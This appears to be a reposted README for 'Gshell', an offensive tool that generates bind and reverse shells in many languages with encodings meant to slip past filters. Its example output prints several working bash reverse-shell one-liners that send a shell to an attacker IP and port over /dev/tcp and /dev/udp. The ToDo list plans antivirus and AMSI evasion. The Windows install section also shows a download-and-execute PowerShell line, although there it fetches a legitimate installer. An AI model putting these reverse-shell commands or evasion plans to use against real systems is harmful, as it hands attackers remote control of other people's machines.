Gshell - A Flexible And Scalable Cross-Plaform Shell Generator Tool
A simple yet flexible cross-platform shell generator tool.
Name: G(Great) Shell
Description: A cross-platform shell generator tool that lets you generate whichever shell you want, in any system you want, giving you full control and automation.
If you find this tool helpful, then please give me a star as it tells me that I should add more features to it.
Is cross-platform, you can use it in operating systems such as:
- Unix-based systems
- GNU/Linux
- Windows
- macOS
Generates the following shells:
- Bind Shells: The target has a listening port and we connect to the target.
- Reverse Shells: We have a listening port and the target connects to us.
Supports the following encodings (as of now):
- URL Encoding: Bypass URL filters
- Base64/32/16 Encodings: Bypass string/keyword filters
- PowerShell Base64 Encoding
Supports the follow IP versions:
- IPv4
- IPv6
Supported protocols:
- TCP
- UDP
- ICMP
Note: You can add your own shells that use other protocols such as DNS.
Supports the following languages and tools:
- PowerShell
- Python
- Bash
- Sh
- Perl
- Socat
- Netcat
- Nc
- Awk
- Lua
- NodeJS
- OpenSSL
- PHP
- Ruby
- Telnet
- Golang
- C#
- Dart
- Groovy
- Many more...
It is limitless, feel free to add as many as you desire!
The shells are stored in markdown files as it makes it easy for everyone.
You can add more bind shells by adding markdown code blocks the following file:
shells/bind_shells.md
You can also add more reverse shells by adding markdown code blocks the following file:
shells/reverse_shells.md
These can be one-liners and multi-liners, it doesn't matter. You can even add C# multi-liners code blocks if you want.
Example, replace the IP address and the port placeholders or variables values with these placeholders in your code:
$ip, $port
That's it, now you can add more.
Note: It also offers advice and tips for performing and troubleshooting attacks.
Overview
This is the help menu:
❯ python3 gshell.py --helpusage: gshell.py [-i <IP ADDRESS>] [-p <PORT NUMBER>] [-s <SHELL TYPE>] [-r] [-b] [--base64] [--base32] [--base16] [--url] [--no-block] [--debug] [-l] [-a] [-h] ██████ ███████ ██ ██ ███████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███ ███████ ███████ █████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██████ ███████ ██ ██ ███████ ███████ ███████ Generate bind shells and/or reverse shells with style Version: 1.0 Author: nozerobit Twitter: @nozerobitOptions: -i <IP ADDRESS>, --ip <IP ADDRESS> Specify the IP address -p <PORT NUMBER>, --port <PORT NUMBER> Specify the port number -s <SHELL TYPE>, --shell <SHELL TYPE> Specify a shell type (python, nc, bash, etc)Payload Types: -r, --reverse Victim communicates back to the attacking machine -b, --bind Open up a listener on the victim machineEncoding Options: --base64 Add base64 encoding --base32 Add base32 encoding --base16 Add base16 encoding --url Add URL encodingMarkdown Options: --no-block Skip ``` code blocks ``` while parsingHelp Options: -l, --list List the available shell types -a, --advice Print advice and tips to get connections -h, --help Show this help message and exit
Example, generate bash reverse shells:
❯ python3 gshell.py -i 192.168.145.134 -p 444 -r -s bash[+] The IPv4 address: 192.168.145.134 is valid.[+] The port number: 444 is valid.[+] Shell type is valid[+] Preparing reverse shells[+] Generating bash shellsbash -i >& /dev/tcp/192.168.145.134/444 0>&10<&196;exec 196<>/dev/tcp/192.168.145.134/444; sh <&196 >&196 2>&196/bin/bash -l > /dev/tcp/192.168.145.134/444 0<&1 2>&1bash -i >& /dev/tcp/192.168.145.134/444 0>&1bash -i >& /dev/udp/192.168.145.134/444 0>&1
Installation in Linux
Clone or download the repository:
git clone https://github.com/nozerobit/gshell
Install the requirements:
python3 -m pip install -r gshell/requirements.txt
Add the tool to the $PATH
environment variable:
sudo ln -s $(pwd)/gshell/gshell.py /usr/local/bin/gshell.py && chmod +x /usr/local/bin/gshell.py
Execute the tool:
gshell.py
Installation in Windows
Clone or download the repository:
git clone https://github.com/nozerobit/gshell C:\\Tools
Note: I created a directory named
Tools
in theC:\
root directory. You can create this directory with the commandmd C:\Tools
.
Install chocolatey with CMD as Administrator:
@powershell -NoProfile -ExecutionPolicy Bypass -Command "iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1'))" && SET PATH=%PATH%;%ALLUSERSPROFILE%\chocolatey\bin
Install python3 in Windows:
choco install -y python3
Install pip:
python -m pip install --upgrade pip
Install the requirements:
python -m pip install -r gshell/requirements.txt
Note: You can change the directory if you want, just make sure that it contains the
gshell
project folder.
Change to the project directory:
cd C:\Tools
Execute the tool:
python gshell.py
Contact & Contributing
If you find any issues then you can open an issue, contact me on twitter or discord (preferred).
If you want to contribute then please feel free.
Any feedback is appreciated.
ToDo
For the version 2.0 which should have the following:
- Encryptors: To bypass AVs
- Obfuscators: To bypass AVs
- Anti-AMSI: To bypass AMSI
- Shellcode Generator: For shellcode runners, binary explitation, etc.
Source: www.kitploit.com